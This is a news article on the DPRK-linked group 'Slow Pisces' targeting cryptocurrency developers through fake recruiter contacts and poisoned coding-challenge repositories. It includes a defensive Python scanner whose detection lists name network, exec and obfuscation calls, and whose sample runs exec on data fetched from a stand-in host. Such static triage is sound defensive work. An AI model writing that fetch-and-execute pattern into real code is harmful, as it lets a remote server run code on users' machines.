
Developers in the crosshairs of notorious DPRK crew ‘Slow Pisces’


A North Korea-affiliated cyber operation has turned its attention to developers, in the hope of gaining an upstream foothold in the software supply chain.

The group known as "Slow Pisces" has been socially engineering developers by targeting LinkedIn profiles with job offers that lead to poisoned coding challenges, according to researchers with the Palo Alto Networks Unit 42 security team.

In a typical attack, the threat actor poses as a job recruiter and contacts a targeted developer profile (or sprays a batch of profiles). The target is then asked to complete a coding challenge, a common hiring assessment in which the developer is placed in a controlled environment and asked to solve a series of programming problems.

This is where the attack by the Democratic People's Republic of Korea (DPRK)-linked hackers picks up. The coding challenge is delivered as a Python or JavaScript code repository with a malicious script embedded in it. Repositories in other languages were found only in negligible numbers.

“This scarcity suggests attackers might have created repositories on demand, based on a target's preferred programming language,” the Unit 42 researchers explained.

“Consequently the group more frequently used languages more popular in the cryptocurrency sector, such as JavaScript and Python.”

Code in the repository contacts a command-and-control server, which decides whether the visiting system is of interest to the attackers and, if so, delivers a malicious payload. The screening criteria include IP address, geolocation, time zone, and HTTP headers.

Should the target be deemed worthy of attack, the server serves a malware package that is then installed and executed; researchers believe it to be an information stealer. If not, the connection is terminated and no payload is delivered.
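The practical consequence of that server-side gating is that running the challenge in a sandbox may show nothing: an analyst's IP, time zone or headers can fail the screening and receive benign data. A triage step that does not depend on observed behaviour is to inspect the repository statically for the capability the report describes, namely code that fetches remote content and turns it into code or commands. The scanner below is an added example written for this page, not code from Unit 42 or from the group's repositories; the function names, the lists of suspicious calls and the sample sources are all assumptions, and the call lists are deliberately short rather than exhaustive.

```python
"""Static triage of a take-home 'coding challenge' repository before it is run.

Added example; not from the Unit 42 report. Flags code that reaches the network,
executes data as code or runs commands, and reports a capability-based verdict.
The (module, attribute) tables are assumptions: a practical, incomplete list.
"""
import ast
import re
from dataclasses import dataclass
from pathlib import Path
from typing import Dict, List, Optional


@dataclass(frozen=True)
class Finding:
    path: str
    line: int
    kind: str    # "network", "exec", "obfuscation", "url" or "parse-error"
    detail: str


NETWORK_ATTRS = {("requests", "get"), ("requests", "post"), ("requests", "request"),
                 ("urllib.request", "urlopen"), ("urllib.request", "urlretrieve"),
                 ("httpx", "get"), ("httpx", "post"), ("socket", "create_connection")}
EXEC_ATTRS = {("pickle", "loads"), ("pickle", "load"), ("marshal", "loads"),
              ("yaml", "load"), ("yaml", "unsafe_load"), ("subprocess", "Popen"),
              ("subprocess", "run"), ("subprocess", "call"), ("os", "system"), ("os", "popen")}
OBFUSCATION_ATTRS = {("base64", "b64decode"), ("zlib", "decompress"), ("codecs", "decode")}
EXEC_BUILTINS = {"exec", "eval", "compile", "__import__"}
URL_RE = re.compile(r"https?://[^\s'\"<>]+")
JS_PATTERNS = [  # line-based regex triage for JavaScript/TypeScript (assumed patterns)
    ("network", re.compile(r"\b(fetch|XMLHttpRequest|axios\.\w+|https?\.(get|request))\s*\(")),
    ("network", re.compile(r"require\(\s*['\"](https?|net|axios|node-fetch)['\"]\s*\)")),
    ("exec", re.compile(r"\beval\s*\(|new\s+Function\s*\(|\bvm\.run\w*\s*\(|\bexec(Sync)?\s*\(")),
    ("exec", re.compile(r"require\(\s*['\"](child_process|vm)['\"]\s*\)")),
    ("obfuscation", re.compile(r"\batob\s*\(|Buffer\.from\s*\(|String\.fromCharCode")),
]


def _dotted_name(node: ast.AST) -> Optional[str]:
    """Return 'a.b.c' for a Name/Attribute chain; None for anything else (e.g. x().y)."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


def scan_python(src: str, path: str = "<memory>") -> List[Finding]:
    """AST scan: resolve import aliases, then classify every call and URL literal."""
    try:
        tree = ast.parse(src)
    except SyntaxError as e:
        return [Finding(path, e.lineno or 0, "parse-error", str(e))]
    aliases: Dict[str, str] = {}          # local binding -> fully qualified name
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            for a in node.names:          # 'import urllib.request' binds 'urllib'
                aliases[a.asname or a.name.split(".")[0]] = a.name if a.asname else a.name.split(".")[0]
        elif isinstance(node, ast.ImportFrom) and node.module:
            for a in node.names:          # 'from os import system' binds 'system'
                aliases[a.asname or a.name] = f"{node.module}.{a.name}"
    out: List[Finding] = []
    for node in ast.walk(tree):
        if isinstance(node, ast.Constant) and isinstance(node.value, str) and URL_RE.search(node.value):
            out.append(Finding(path, node.lineno, "url", node.value))
        if not isinstance(node, ast.Call):
            continue
        name = _dotted_name(node.func)
        if name is None:
            continue
        head, _, rest = name.partition(".")
        full = aliases.get(head, head) + ("." + rest if rest else "")
        key = tuple(full.rsplit(".", 1)) if "." in full else None
        if full in EXEC_BUILTINS or key in EXEC_ATTRS:
            out.append(Finding(path, node.lineno, "exec", full))
        elif key in NETWORK_ATTRS:
            out.append(Finding(path, node.lineno, "network", full))
        elif key in OBFUSCATION_ATTRS:
            out.append(Finding(path, node.lineno, "obfuscation", full))
    return out


def scan_js(src: str, path: str = "<memory>") -> List[Finding]:
    """Regex scan for JavaScript/TypeScript; cruder than the AST pass but catches the common shapes."""
    out: List[Finding] = []
    for lineno, line in enumerate(src.splitlines(), 1):
        for kind, pat in JS_PATTERNS:
            m = pat.search(line)
            if m:
                out.append(Finding(path, lineno, kind, m.group(0)))
        for url in URL_RE.findall(line):
            out.append(Finding(path, lineno, "url", url))
    return out


def scan_repo(root: str) -> List[Finding]:
    """Walk a checked-out challenge repo, vendored directories included."""
    out: List[Finding] = []
    for p in Path(root).rglob("*"):
        if p.suffix == ".py":
            out += scan_python(p.read_text(errors="replace"), str(p))
        elif p.suffix in {".js", ".mjs", ".cjs", ".ts"}:
            out += scan_js(p.read_text(errors="replace"), str(p))
    return out


def verdict(findings: List[Finding]) -> str:
    """Judge what the code can do, not what it did on one run: a gated C2 may
    have served benign data because the analyst failed its screening."""
    kinds = {f.kind for f in findings}
    if "network" in kinds and "exec" in kinds:
        return "fetch-and-execute"
    if "network" in kinds or "url" in kinds:
        return "network-only"
    if "exec" in kinds:
        return "exec-only"
    return "clean"


if __name__ == "__main__":
    # Constructed sample resembling the pattern the report describes (not real attacker code).
    SAMPLE = 'import requests\ncfg = requests.get("https://example.invalid/cfg").json()\nexec(cfg["setup"])\n'
    hits = scan_python(SAMPLE, "challenge/setup.py")
    for h in hits:
        print(f"{h.path}:{h.line} [{h.kind}] {h.detail}")
    print("verdict:", verdict(hits))
```

Run `scan_repo` over the cloned challenge before opening it in an IDE that auto-runs project scripts or installs dependencies; a "fetch-and-execute" verdict on a repository that is supposed to be a self-contained programming test is reason enough to stop, regardless of what the remote server returns to you.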

Targeting developers has become an increasingly popular tactic for threat actors and cybercriminals because of the key role developers play in the software supply chain. In addition to direct malware attacks, threat actors have been seeding public code and package repositories with poisoned libraries that mimic the ones developers most commonly use.

By compromising a developer's machine, an attacker can gain access to that developer's projects and insert backdoors into the eventual product. A compromised service or infrastructure component can in turn be used to take over the systems of customers further downstream.

In this case, it is believed that the Slow Pisces hackers are trying to go after developers and organizations operating in the cryptocurrency sector. The Unit 42 team noted that the LinkedIn profiles associated with the attack were almost all impersonating prominent cryptocurrency companies and exchanges.

This matches the behavioral patterns of Slow Pisces and of other North Korean threat actors. Facing heavy monetary and trade sanctions, the Hermit Kingdom has looked to cryptocurrency as a way to generate cash outside the international trade market.

Shaun Nichols

A career IT news journalist, Shaun has spent 17 years covering the industry with a specialty in the cybersecurity field.
